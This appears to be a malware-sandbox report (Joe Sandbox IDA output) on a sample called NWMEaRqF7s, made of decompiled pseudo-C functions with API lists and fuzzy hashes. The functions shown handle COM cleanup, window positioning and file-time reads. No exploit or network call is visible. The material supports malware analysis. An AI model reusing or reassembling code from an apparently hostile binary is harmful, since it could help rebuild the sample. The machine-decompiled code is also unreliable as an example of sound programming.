                                                      						 *[fs:0x0] = _v12;
                                                      						_pop(_t220);
                                                      						_pop(_t223);
                                                      						_pop(_t182);
                                                      						_t140 = E0041E5DF(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
                                                      						__eflags =  &_a120;
                                                      						return _t140;
                                                      					} else {
                                                      						__eax = _a16;
                                                      						__ecx =  *__eax;
                                                      						__edx =  &_a8;
                                                      						_push( &_a8);
                                                      						_push(0x439520);
                                                      						_push(__eax);
                                                      						__eflags = __eax;
                                                      						if(__eflags >= 0) {
                                                      							__eax = _a8;
                                                      							__edx =  &_a12;
                                                      							_push( &_a12);
                                                      							_push(0x439660);
                                                      							_a12 = 0;
                                                      							__ecx =  *__eax;
                                                      							_push(__eax);
                                                      							__eflags = __eax;
                                                      							if(__eflags >= 0) {
                                                      								__eax = _a12;
                                                      								__ecx =  *__eax;
                                                      								__edx = __esi + 0x58;
                                                      								__edx =  *(__esi + 4);
                                                      								__edx =  *(__esi + 4) + 0xe8;
                                                      								__eflags = __edx;
                                                      								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
                                                      								__eax = _a12;
                                                      								__ecx =  *__eax;
                                                      								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      							}
                                                      							__eax = _a8;
                                                      							__ecx =  *__eax;
                                                      							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      						}
                                                      						__eax = E00402EE1(__eflags, 0x14);
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax == __edi) {
                                                      							__eax = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							__ecx = __eax;
                                                      							__eax = E00416B92(__eax, _a16);
                                                      						}
                                                      						 *(__esi + 0x50) = __eax;
                                                      						__eax = _a16;
                                                      						__ecx =  *__eax;
                                                      						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                      						__eax =  *(__esi + 0x50);
                                                      						__ecx =  *__eax;
                                                      						__eflags =  *__eax - __edi;
                                                      						if(__eflags != 0) {
                                                      							__eflags = __eax;
                                                      							__eax = E00413F84(__ecx, __eax);
                                                      						}
                                                      						__eax = E00402EE1(__eflags, 0x28);
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax == __edi) {
                                                      							__eax = 0;
                                                      							__eflags = 0;
                                                      						} else {
                                                      							__ecx = __eax;
                                                      							__eax = E00412BEB(__eax, __edi, 0x1f40);
                                                      						}
                                                      						__edx =  *(__esi + 0x50);
                                                      						 *(__esi + 0x54) = __eax;
                                                      						__ecx = __eax;
                                                      						__eax =  *(__esi + 0x54);
                                                      						__ecx =  *(__esi + 0x50);
                                                      						 *(__ecx + 8) =  *(__esi + 0x54);
                                                      						__eax =  *(__esi + 0x54);
                                                      						__eax =  *( *(__esi + 0x54) + 0xc);
                                                      						__eflags = __eax - 0x3333333;
                                                      						 *(__esi + 0x10) = __eax;
                                                      						if(__eax <= 0x3333333) {
                                                      							__eax = __eax * 0x28;
                                                      							__imp__CoTaskMemAlloc(__eax);
                                                      							__ecx = 0;
                                                      							__eflags = __eax - __edi;
                                                      							__ecx = 0 | __eflags != 0x00000000;
                                                      							 *(__esi + 0x14) = __eax;
                                                      							if(__eflags != 0) {
                                                      								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
                                                      								__eax = E0041F330(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
                                                      								__ecx =  *(__esi + 0x50);
                                                      								__eax = E00416BB4( *(__esi + 0x50));
                                                      								__ecx =  *(__esi + 0x50);
                                                      								__eax = E00413F41(__ecx);
                                                      								L32:
                                                      								__eflags =  *(_t222 + 0x10);
                                                      								_a16 = 0;
                                                      								if( *(_t222 + 0x10) > 0) {
                                                      									_t187 = 0;
                                                      									__eflags = 0;
                                                      									do {
                                                      										_t163 = E00402EE1(__eflags, 0x1c);
                                                      										_a8 = _t163;
                                                      										__eflags = _t163;
                                                      										_v4 = 0;
                                                      										if(_t163 == 0) {
                                                      											_t164 = 0;
                                                      											__eflags = 0;
                                                      										} else {
                                                      											_t164 = E0041A1D8(_t163, 0xa);
                                                      										}
                                                      										_v4 = _v4 | 0xffffffff;
                                                      										_a16 = _a16 + 1;
                                                      										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
                                                      										_t187 = _t187 + 0x28;
                                                      										__eflags = _a16 -  *(_t222 + 0x10);
                                                      									} while (__eflags < 0);
                                                      								}
                                                      								_t185 = _v16;
                                                      								__eflags = _t185;
                                                      								if(_t185 != 0) {
                                                      									__eflags = _a4;
                                                      									if(_a4 > 0) {
                                                      										_t154 = 0xffffffdc;
                                                      										_t186 = _t185 + 0x24;
                                                      										_a16 = _a4;
                                                      										_a8 = _t154 - _v16;
                                                      										while(1) {
                                                      											_t202 =  *( *_t186 + 4);
                                                      											__eflags = _t202;
                                                      											_a4 = _t202;
                                                      											if(_t202 == 0) {
                                                      												goto L46;
                                                      											}
                                                      											while(1) {
                                                      												_t158 = E00406B97( &_a4);
                                                      												_t215 =  *_t222;
                                                      												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
                                                      												__eflags = _a4;
                                                      												if(_a4 == 0) {
                                                      													goto L46;
                                                      												}
                                                      											}
                                                      											L46:
                                                      											E0041A100( *_t186);
                                                      											_t204 =  *_t186;
                                                      											__eflags = _t204;
                                                      											if(_t204 != 0) {
                                                      												 *((intOrPtr*)( *_t204 + 4))(1);
                                                      											}
                                                      											_t186 =  &(_t186[0xa]);
                                                      											_t127 =  &_a16;
                                                      											 *_t127 = _a16 - 1;
                                                      											__eflags =  *_t127;
                                                      											if( *_t127 != 0) {
                                                      												continue;
                                                      											}
                                                      											goto L49;
                                                      										}
                                                      									}
                                                      									L49:
                                                      									__imp__CoTaskMemFree(_v16);
                                                      								}
                                                      								L50:
                                                      								_t139 =  *_t225;
                                                      								goto L51;
                                                      							} else {
                                                      								_push(_t225);
                                                      								_t228 = _t232;
                                                      								_push(_t188);
                                                      								 *((intOrPtr*)(_t228 - 4)) = 0x442350;
                                                      								E0041F7F4(_t228 - 4, 0x43c4ec);
                                                      								asm("int3");
                                                      								_push(_t228);
                                                      								_t229 = _t232;
                                                      								_push(_t188);
                                                      								_t10 = _t229 - 4; // 0x442350
                                                      								 *((intOrPtr*)(_t229 - 4)) = 0x4423e8;
                                                      								E0041F7F4(_t10, 0x43c54c);
                                                      								asm("int3");
                                                      								_push(_t229);
                                                      								_t230 = _t232;
                                                      								_push(_t188);
                                                      								_t12 = _t230 - 4; // 0x4423e8
                                                      								 *((intOrPtr*)(_t230 - 4)) = 0x442480;
                                                      								E0041F7F4(_t12, 0x43c590);
                                                      								asm("int3");
                                                      								_push(4);
                                                      								E0041F6EA(E00431BFC, _t181, 0, _t222);
                                                      								_t214 = E0040F014(0x104);
                                                      								 *((intOrPtr*)(_t230 - 0x10)) = _t214;
                                                      								_t179 = 0;
                                                      								 *((intOrPtr*)(_t230 - 4)) = 0;
                                                      								if(_t214 != 0) {
                                                      									_t179 = E0040D519(_t214);
                                                      								}
                                                      								return E0041F7C2(_t179);
                                                      							}
                                                      						} else {
                                                      							__eax = 0x8007000e;
                                                      							goto L51;
                                                      						}
                                                      					}
                                                      				}
                                                      			}




















































                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00417358
                                                      • CoTaskMemAlloc.OLE32(?,?), ref: 00417476
                                                      • _memset.LIBCMT ref: 00417498
                                                      • CoTaskMemFree.OLE32(?), ref: 00417674
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                      • String ID:
                                                      • API String ID: 2459298410-0
                                                      • Opcode ID: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
                                                      • Instruction ID: b46673a723d36e3b76cc53f0188287a817d86e82d50fda7b55772a3566616555
                                                      • Opcode Fuzzy Hash: 001287e20e2fc686fcc355d7d200779804c9778623c1a0276216663245252576
                                                      • Instruction Fuzzy Hash: 17C11A70604709AFCB14DF69C884AAAB7F5FF88314B20891EF816CB391D778E985CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E004181EB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr* _t83;
                                                      				intOrPtr* _t84;
                                                      				intOrPtr _t85;
                                                      				intOrPtr* _t86;
                                                      				intOrPtr _t101;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr* _t122;
                                                      				intOrPtr* _t124;
                                                      				intOrPtr* _t126;
                                                      				intOrPtr* _t128;
                                                      				intOrPtr* _t130;
                                                      				intOrPtr* _t145;
                                                      				intOrPtr* _t151;
                                                      				intOrPtr* _t160;
                                                      				intOrPtr _t161;
                                                      				intOrPtr _t162;
                                                      				void* _t163;
                                                      				void* _t164;
                                                      				intOrPtr _t166;
                                                      				intOrPtr* _t167;
                                                      				void* _t168;
                                                      				intOrPtr _t180;
                                                      
                                                      				_push(0x10);
                                                      				E0041F6EA(E004332B3, __ebx, __edi, __esi);
                                                      				_t166 = __ecx;
                                                      				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x436a4c;
                                                      				 *(_t168 - 4) = 0;
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                      					L11:
                                                      					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
                                                      						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
                                                      						__eflags = _t160;
                                                      						if(_t160 == 0) {
                                                      							break;
                                                      						}
                                                      						_t151 =  *_t160;
                                                      						__eflags = _t151;
                                                      						if(_t151 == 0) {
                                                      							break;
                                                      						}
                                                      						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
                                                      						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
                                                      					}
                                                      					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
                                                      					E0041A100(_t166 + 0x18);
                                                      					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
                                                      						L19:
                                                      						_t83 =  *((intOrPtr*)(_t166 + 8));
                                                      						if(_t83 != 0) {
                                                      							 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                      						}
                                                      						_t84 =  *((intOrPtr*)(_t166 + 0xc));
                                                      						if(_t84 != 0) {
                                                      							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                      						}
                                                      						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
                                                      							L32:
                                                      							_t85 =  *((intOrPtr*)(_t166 + 0x34));
                                                      							if(_t85 != 0) {
                                                      								__imp__CoTaskMemFree(_t85);
                                                      							}
                                                      							_t136 =  *((intOrPtr*)(_t166 + 0x54));
                                                      							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
                                                      								E00416BFF(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
                                                      								E00412C14( *((intOrPtr*)(_t166 + 0x54)));
                                                      							}
                                                      							_t161 =  *((intOrPtr*)(_t166 + 0x54));
                                                      							_t192 = _t161;
                                                      							if(_t161 != 0) {
                                                      								E00412C14(_t161);
                                                      								_push(_t161);
                                                      								E00402F0C(0, _t161, _t166, _t192);
                                                      							}
                                                      							_t162 =  *((intOrPtr*)(_t166 + 0x50));
                                                      							_t193 = _t162;
                                                      							if(_t162 != 0) {
                                                      								E00417FCA(_t162, _t193);
                                                      								_push(_t162);
                                                      								E00402F0C(0, _t162, _t166, _t193);
                                                      							}
                                                      							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
                                                      							if(_t86 != 0) {
                                                      								 *((intOrPtr*)( *_t86 + 8))(_t86);
                                                      							}
                                                      							_t167 =  *((intOrPtr*)(_t166 + 0x48));
                                                      							if(_t167 != 0) {
                                                      								 *((intOrPtr*)( *_t167 + 8))(_t167);
                                                      							}
                                                      							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                      							return E0041F7C2(E0041A1FB( *((intOrPtr*)(_t168 - 0x18))));
                                                      						} else {
                                                      							 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
                                                      								L31:
                                                      								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
                                                      								goto L32;
                                                      							}
                                                      							_t163 = 0;
                                                      							do {
                                                      								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
                                                      								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
                                                      								if(_t101 == 0) {
                                                      									goto L28;
                                                      								} else {
                                                      									goto L27;
                                                      								}
                                                      								do {
                                                      									L27:
                                                      									 *((intOrPtr*)( *((intOrPtr*)(E00406B97(_t168 - 0x14))) + 0x98)) = 0;
                                                      								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
                                                      								L28:
                                                      								E0041A100( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
                                                      								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
                                                      								if(_t145 != 0) {
                                                      									 *((intOrPtr*)( *_t145 + 4))(1);
                                                      								}
                                                      								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
                                                      								_t163 = _t163 + 0x28;
                                                      							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
                                                      							goto L31;
                                                      						}
                                                      					}
                                                      					_t164 = 0;
                                                      					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
                                                      						L17:
                                                      						if(_t180 != 0) {
                                                      							_push( *((intOrPtr*)(_t166 + 0x3c)));
                                                      							E00402F0C(0, _t164, _t166, _t180);
                                                      							_push( *((intOrPtr*)(_t166 + 0x40)));
                                                      							E00402F0C(0, _t164, _t166, _t180);
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      					do {
                                                      						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
                                                      						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
                                                      						_t164 = _t164 + 1;
                                                      					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
                                                      					_t180 =  *((intOrPtr*)(_t166 + 0x38));
                                                      					goto L17;
                                                      				}
                                                      				_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                      				if(_t121 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t122 =  *_t121;
                                                      				_push(_t168 - 0x14);
                                                      				_push(0x439520);
                                                      				_push(_t122);
                                                      				if( *((intOrPtr*)( *_t122))() < 0) {
                                                      					goto L11;
                                                      				}
                                                      				_t124 =  *((intOrPtr*)(_t168 - 0x14));
                                                      				if(_t124 == 0) {
                                                      					goto L11;
                                                      				}
                                                      				_push(_t168 - 0x10);
                                                      				_push(0x439660);
                                                      				 *((intOrPtr*)(_t168 - 0x10)) = 0;
                                                      				_push(_t124);
                                                      				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                      					_t128 =  *((intOrPtr*)(_t168 - 0x10));
                                                      					if(_t128 != 0) {
                                                      						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                      						_t130 =  *((intOrPtr*)(_t168 - 0x10));
                                                      						 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                      					}
                                                      				}
                                                      				_t126 =  *((intOrPtr*)(_t168 - 0x14));
                                                      				 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                      				goto L11;
                                                      			}


























                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004181F2
                                                      • VariantClear.OLEAUT32(?), ref: 004182B6
                                                      • CoTaskMemFree.OLE32(?,00000010), ref: 00418363
                                                      • CoTaskMemFree.OLE32(?,00000010), ref: 00418371
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                      • String ID:
                                                      • API String ID: 365290523-0
                                                      • Opcode ID: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
                                                      • Instruction ID: 59d339b82a7be658d62f54fd823bf36d6654d79d954229c5207d740f0b8cb97e
                                                      • Opcode Fuzzy Hash: f43a4734b95fc7b9ba13739095310105ed9ff544ff7f9a3fcef366ab354341a4
                                                      • Instruction Fuzzy Hash: FD713871A00A069FCB20DFA5C9C49AEB7F1BF48304724096EE556DB661CB39EC81CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 022421F9
                                                      • SetLastError.KERNEL32(0000007E), ref: 0224223B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ErrorHugeLastRead
                                                      • String ID:
                                                      • API String ID: 3239643929-0
                                                      • Opcode ID: 1507b21e0b8afc40092b3418b41c9e4713093c8a94b41042287dd16bbe8cc815
                                                      • Instruction ID: 7995706fe7658207796502790e8806651987640a3b712c00c511c8f021993b2d
                                                      • Opcode Fuzzy Hash: 1507b21e0b8afc40092b3418b41c9e4713093c8a94b41042287dd16bbe8cc815
                                                      • Instruction Fuzzy Hash: 1481BB75A10209DFDB08CF95D894BADBBB1FF48314F248298E909AB355C774EA81CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E00417E15(signed int __ecx, void* __edx) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				struct tagRECT _v40;
                                                      				struct tagRECT _v56;
                                                      				char _v76;
                                                      				intOrPtr _v88;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t63;
                                                      				signed int _t64;
                                                      				intOrPtr _t70;
                                                      				signed int _t72;
                                                      				signed int _t73;
                                                      				signed int _t75;
                                                      				intOrPtr* _t77;
                                                      				signed int _t78;
                                                      				intOrPtr* _t80;
                                                      				signed int _t81;
                                                      				intOrPtr* _t82;
                                                      				intOrPtr* _t84;
                                                      				signed int _t86;
                                                      				signed int _t88;
                                                      				signed int _t92;
                                                      				intOrPtr* _t99;
                                                      				signed int _t100;
                                                      				signed int _t126;
                                                      				intOrPtr _t127;
                                                      				void* _t144;
                                                      				void* _t147;
                                                      				intOrPtr* _t148;
                                                      				signed int** _t150;
                                                      				signed int* _t151;
                                                      				signed int _t154;
                                                      				signed int _t156;
                                                      				void* _t158;
                                                      				void* _t161;
                                                      
                                                      				_t144 = __edx;
                                                      				_t126 = __ecx;
                                                      				_t158 = _t161;
                                                      				_t154 = __ecx;
                                                      				_t63 =  *((intOrPtr*)(__ecx + 4));
                                                      				_push(_t147);
                                                      				if(_t63 != 0) {
                                                      					_t64 =  *(_t63 + 0x28);
                                                      					__eflags = _t64;
                                                      					if(_t64 == 0) {
                                                      						goto L4;
                                                      					} else {
                                                      						_t126 = _t64;
                                                      						_t72 = E0040AF65(0, _t126, _t147);
                                                      						__eflags = _t72;
                                                      						_v8 = _t72;
                                                      						if(_t72 == 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							_t73 = IsWindowVisible( *(_t72 + 0x20));
                                                      							asm("sbb eax, eax");
                                                      							_t75 =  ~_t73 + 1;
                                                      							__eflags = _t75;
                                                      							_v24 = _t75;
                                                      							if(_t75 != 0) {
                                                      								GetWindowRect( *(E00409C97(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
                                                      								GetWindowRect( *(_v8 + 0x20),  &_v40);
                                                      								asm("cdq");
                                                      								asm("cdq");
                                                      								__eflags = _v56.right - _v56.left - _t144;
                                                      								E0040CA11(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
                                                      								E0040CA4F(_v8, 1);
                                                      							}
                                                      							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                      							_t148 = _t154 + 0x48;
                                                      							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x4369e0, _t148);
                                                      							__eflags = _t78;
                                                      							if(_t78 < 0) {
                                                      								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
                                                      								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x436a38,  &_v16);
                                                      								__eflags = _t81;
                                                      								if(_t81 >= 0) {
                                                      									_t82 = _v16;
                                                      									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
                                                      									_t84 = _v16;
                                                      									 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                      									_t86 = _v20;
                                                      									__eflags = _t86;
                                                      									if(_t86 != 0) {
                                                      										_t150 = _t154 + 8;
                                                      										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x439320, _t150);
                                                      										_t88 = _v20;
                                                      										 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                      										_t81 = _v12;
                                                      										__eflags = _t81;
                                                      										if(__eflags >= 0) {
                                                      											_t151 =  *_t150;
                                                      											 *( *_t151)(_t151, 0x439310, _t154 + 0xc);
                                                      											goto L21;
                                                      										}
                                                      									} else {
                                                      										_t81 = 0x80004005;
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_t99 =  *_t148;
                                                      								_t151 = _t154 + 0x4c;
                                                      								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x4395b0, _t151);
                                                      								__eflags =  *_t151;
                                                      								_v12 = _t100;
                                                      								if( *_t151 == 0) {
                                                      									_v12 = 0x80004003;
                                                      								}
                                                      								__eflags = _v12;
                                                      								if(__eflags >= 0) {
                                                      									L21:
                                                      									_t92 = E0041733F(0, _t154, _t151, _t154, __eflags);
                                                      									__eflags = _v24;
                                                      									_t156 = _t92;
                                                      									if(_v24 != 0) {
                                                      										__eflags = _v40.right - _v40.left;
                                                      										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                      										E0040CA4F(_v8, 0);
                                                      									}
                                                      									_t81 = _t156;
                                                      								} else {
                                                      									__eflags = _v24;
                                                      									if(_v24 != 0) {
                                                      										__eflags = _v40.right - _v40.left;
                                                      										E0040CA11(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
                                                      										E0040CA4F(_v8, 0);
                                                      									}
                                                      									_t81 = _v12;
                                                      								}
                                                      							}
                                                      							return _t81;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L4:
                                                      					_push(_t158);
                                                      					_push(_t126);
                                                      					_t2 =  &_v76; // 0x4423e8
                                                      					_v76 = 0x442480;
                                                      					E0041F7F4(_t2, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, 0, _t147, _t154);
                                                      					_t127 = E0040F014(0x104);
                                                      					_v88 = _t127;
                                                      					_t70 = 0;
                                                      					_v76 = 0;
                                                      					if(_t127 != 0) {
                                                      						_t70 = E0040D519(_t127);
                                                      					}
                                                      					return E0041F7C2(_t70);
                                                      				}
                                                      			}













































                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$DesktopVisible
                                                      • String ID:
                                                      • API String ID: 1055025324-0
                                                      • Opcode ID: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
                                                      • Instruction ID: 8e4b7480244538acadc42369d4a2fea37553eaefd090f2d635b64ddf38e68156
                                                      • Opcode Fuzzy Hash: 9fd2e131ecfaca2e4f596605befef15e013afeb60e8cd7df608e467907c7161e
                                                      • Instruction Fuzzy Hash: 3651D975A0020AEFCB00DFE8C984DAEBBB9FF48344B2445A9F505E7251CB35AD41CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041B2DE(void* __ecx, void* __eflags, signed int* _a4) {
                                                      				char _v12;
                                                      				struct _FILETIME _v20;
                                                      				struct _FILETIME _v28;
                                                      				char _v36;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t52;
                                                      				long _t56;
                                                      				signed int* _t75;
                                                      				signed int* _t78;
                                                      				signed int* _t81;
                                                      				struct _FILETIME* _t88;
                                                      				void* _t100;
                                                      				CHAR* _t101;
                                                      				signed int* _t102;
                                                      				void* _t103;
                                                      				void* _t107;
                                                      
                                                      				_t85 = __ecx;
                                                      				_t102 = _a4;
                                                      				_t100 = __ecx;
                                                      				E0041F330(__ecx, _t102, 0, 0x128);
                                                      				E00402FE8(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
                                                      				_t52 =  *(_t100 + 4);
                                                      				_t107 = _t52 -  *0x43664c; // 0xffffffff
                                                      				if(_t107 == 0) {
                                                      					L21:
                                                      					return 1;
                                                      				}
                                                      				_t88 =  &_v12;
                                                      				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
                                                      					_t56 = GetFileSize( *(_t100 + 4), 0);
                                                      					_t102[6] = _t56;
                                                      					_t102[7] = 0;
                                                      					if(_t56 != 0xffffffff || 0 != 0) {
                                                      						_t101 =  *(_t100 + 0xc);
                                                      						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
                                                      							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
                                                      						} else {
                                                      							_t102[8] = 0;
                                                      						}
                                                      						if(E0041B166( &_v12) == 0) {
                                                      							 *_t102 = 0;
                                                      							_t102[1] = 0;
                                                      						} else {
                                                      							_t81 = E0041B280( &_v36,  &_v12, 0xffffffff);
                                                      							 *_t102 =  *_t81;
                                                      							_t102[1] = _t81[1];
                                                      						}
                                                      						if(E0041B166( &_v20) == 0) {
                                                      							_t102[4] = 0;
                                                      							_t102[5] = 0;
                                                      						} else {
                                                      							_t78 = E0041B280( &_v36,  &_v20, 0xffffffff);
                                                      							_t102[4] =  *_t78;
                                                      							_t102[5] = _t78[1];
                                                      						}
                                                      						if(E0041B166( &_v28) == 0) {
                                                      							_t102[2] = 0;
                                                      							_t102[3] = 0;
                                                      						} else {
                                                      							_t75 = E0041B280( &_v36,  &_v28, 0xffffffff);
                                                      							_t102[2] =  *_t75;
                                                      							_t102[3] = _t75[1];
                                                      						}
                                                      						if(( *_t102 | _t102[1]) == 0) {
                                                      							 *_t102 = _t102[2];
                                                      							_t102[1] = _t102[3];
                                                      						}
                                                      						if((_t102[4] | _t102[5]) == 0) {
                                                      							_t102[4] = _t102[2];
                                                      							_t102[5] = _t102[3];
                                                      						}
                                                      						goto L21;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				L2:
                                                      				return 0;
                                                      			}























                                                      APIs
                                                      • _memset.LIBCMT ref: 0041B2F5
                                                        • Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8
                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 0041B32C
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0041B341
                                                      Memory Dump Source
